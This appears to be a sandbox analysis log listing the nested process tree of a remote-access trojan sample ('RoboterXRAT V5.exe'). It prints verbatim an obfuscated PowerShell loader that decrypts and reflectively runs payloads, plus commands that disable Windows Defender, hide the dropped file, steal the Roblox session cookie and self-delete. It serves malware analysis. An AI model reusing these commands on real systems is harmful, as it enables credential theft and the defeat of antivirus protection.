        PID:2088
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        35⤵
        
        PID:1692
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        34⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2620
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        33⤵
        
        PID:628
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        32⤵
        
        PID:1720
        
        C:\Windows\system32\net.exe
        
        net file
        33⤵
        
        PID:2816
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        34⤵
        
        PID:2116
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        33⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:532
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        32⤵
        
        PID:2860
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        31⤵
        
        PID:1924
        
        C:\Windows\system32\net.exe
        
        net file
        32⤵
        
        PID:532
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        33⤵
        
        PID:2864
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        32⤵
        
        PID:2040
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        31⤵
        
        PID:2488
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        32⤵
        
        PID:2376
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        33⤵
        
        PID:888
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        34⤵
        
        PID:1780
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        34⤵
        
        PID:2536
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        34⤵
        
        PID:1044
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        33⤵
        
        PID:544
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        33⤵
        
        PID:2152
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        32⤵
        
        PID:1724
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        32⤵
        
        PID:2608
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        30⤵
        
        PID:2600
        
        C:\Windows\system32\net.exe
        
        net file
        31⤵
        
        PID:2624
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        32⤵
        
        PID:3000
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        31⤵
        
        PID:2124
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        30⤵
        
        PID:2648
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        31⤵
        
        PID:284
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        32⤵
        
        PID:612
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        32⤵
        
        PID:2716
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        32⤵
        
        PID:1640
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        31⤵
        
        PID:2036
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        31⤵
        
        PID:2400
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        32⤵
        
        PID:892
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        32⤵
        Views/modifies file attributes
        
        PID:1096
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\sihost.exe'
        32⤵
        
        PID:3052
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        32⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1224
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        32⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2544
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        32⤵
        
        PID:2092
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        32⤵
        
        PID:2936
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        32⤵
        
        PID:1528
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        32⤵
        
        PID:1840
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        32⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2908
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        32⤵
        Detects videocard installed
        
        PID:812
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\sihost.exe" && pause
        32⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:920
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        33⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3016
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        29⤵
        
        PID:1924
        
        C:\Windows\system32\net.exe
        
        net file
        30⤵
        
        PID:1344
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        31⤵
        
        PID:2224
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        30⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1324
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        29⤵
        
        PID:2616
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        30⤵
        
        PID:1964
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        31⤵
        
        PID:1740
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        32⤵
        
        PID:2536
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        33⤵
        
        PID:2308
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        34⤵
        
        PID:1132
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        35⤵
        
        PID:1952
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        36⤵
        
        PID:2360
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        37⤵
        
        PID:1568
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        38⤵
        
        PID:2256
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        39⤵
        
        PID:2636
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        40⤵
        
        PID:2028
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        41⤵
        
        PID:1860
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        42⤵
        
        PID:2628
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        43⤵
        
        PID:1908
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        44⤵
        
        PID:2792
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        45⤵
        
        PID:2896
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        46⤵
        
        PID:1904
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        47⤵
        
        PID:2140
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        48⤵
        
        PID:1208
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        49⤵
        
        PID:2552
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        50⤵
        
        PID:2888
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        51⤵
        
        PID:1560
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        51⤵
        
        PID:2176
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        51⤵
        
        PID:628
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        50⤵
        
        PID:1436
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        50⤵
        
        PID:1548
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        49⤵
        
        PID:1792
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        49⤵
        
        PID:1476
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        50⤵
        
        PID:272
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        50⤵
        Views/modifies file attributes
        
        PID:812
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\sihost.exe'
        50⤵
        
        PID:2088
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        50⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2608
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        50⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1308
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        50⤵
        
        PID:2684
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        50⤵
        
        PID:2464
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        50⤵
        
        PID:2848
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        50⤵
        
        PID:272
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        50⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1488
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        50⤵
        Detects videocard installed
        
        PID:1528
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\sihost.exe" && pause
        50⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1964
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        51⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1220
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        48⤵
        
        PID:884
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        48⤵
        
        PID:1588
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        47⤵
        
        PID:2736
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        47⤵
        
        PID:2200
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        46⤵
        
        PID:2260
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        46⤵
        
        PID:2016
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        45⤵
        
        PID:1436
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        45⤵
        
        PID:2284
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        44⤵
        
        PID:936
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        44⤵
        
        PID:2744
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        43⤵
        
        PID:2696
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        43⤵
        
        PID:2500
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        42⤵
        
        PID:2608
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        42⤵
        
        PID:2620
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        41⤵
        
        PID:2000
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        41⤵
        
        PID:2952
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        40⤵
        
        PID:2820
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        40⤵
        
        PID:1752
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        39⤵
        
        PID:2496
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        39⤵
        
        PID:1904
        
